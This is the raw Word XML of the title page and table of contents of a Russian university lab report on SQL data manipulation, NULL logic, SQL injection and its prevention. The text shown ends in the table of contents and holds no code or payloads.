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06A652F1" w:rsidR="00830F2D" w:rsidRPr="00572DB0"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572DB0">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</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083379BD"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00572DB0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Манипулирование данными и инъекции в языки запросов</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77777777"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08682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2929A132" w14:textId="785AAA41" w:rsidR="00A27369" w:rsidRPr="00B57B60" w:rsidRDefault="00A27369" w:rsidP="00A27369">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07AD9494" w14:textId="5715DC17" w:rsidR="00A27369" w:rsidRPr="00A27369" w:rsidRDefault="00A27369" w:rsidP="00A27369">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5845C544" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA"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35494D33" w14:textId="168E95A1"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w:t>
      </w:r>
      <w:r w:rsidR="007634CF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>истент</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003C218B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00A27369">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Пономарев</w:t>
      </w:r>
      <w:r w:rsidR="00A27369" w:rsidRPr="000005DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A27369">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Д</w:t>
      </w:r>
      <w:r w:rsidR="00A27369" w:rsidRPr="000005DB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A27369">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>А</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43B5750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77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA"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4BBEC2D0" w14:textId="3FBF2695" w:rsidR="00E11E5A"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29005034" w:history="1">
            <w:r w:rsidR="00E11E5A" w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E11E5A" w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Формулировка задания</w:t>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005034 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00E11E5A">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70448791" w14:textId="1F2B5B25" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005035" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Теоретические сведения</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005035 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1011B5FF" w14:textId="46BD23CC" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005036" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Манипулирование данными и особенности SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005036 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="127FB5E8" w14:textId="021B5250" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005037" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NULL и трехзначная логика SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005037 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48723695" w14:textId="504144BF" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005038" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Множественные операции и сложные запросы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005038 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60A4DFE6" w14:textId="24D9EA3F" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005039" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL-инъекции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005039 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="302E585E" w14:textId="51B24532" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005040" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Защита от SQL-инъекций</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005040 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D00D181" w14:textId="02040F49" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005041" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Результаты работы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005041 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23724D62" w14:textId="267CC37C" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005042" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Используемая среда и исходные данные</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005042 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="730F6477" w14:textId="0584E224" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005043" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Реляционная схема первой части</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005043 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="308E2E74" w14:textId="70E97238" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005044" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Реализация запросов первой части</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005044 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5998F07B" w14:textId="2D9B81F0" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005045" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Код реализации на SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005045 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B4E7E71" w14:textId="63D815C3" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005046" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Проверка разграничения доступа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005046 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D559422" w14:textId="72ACDD8E" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
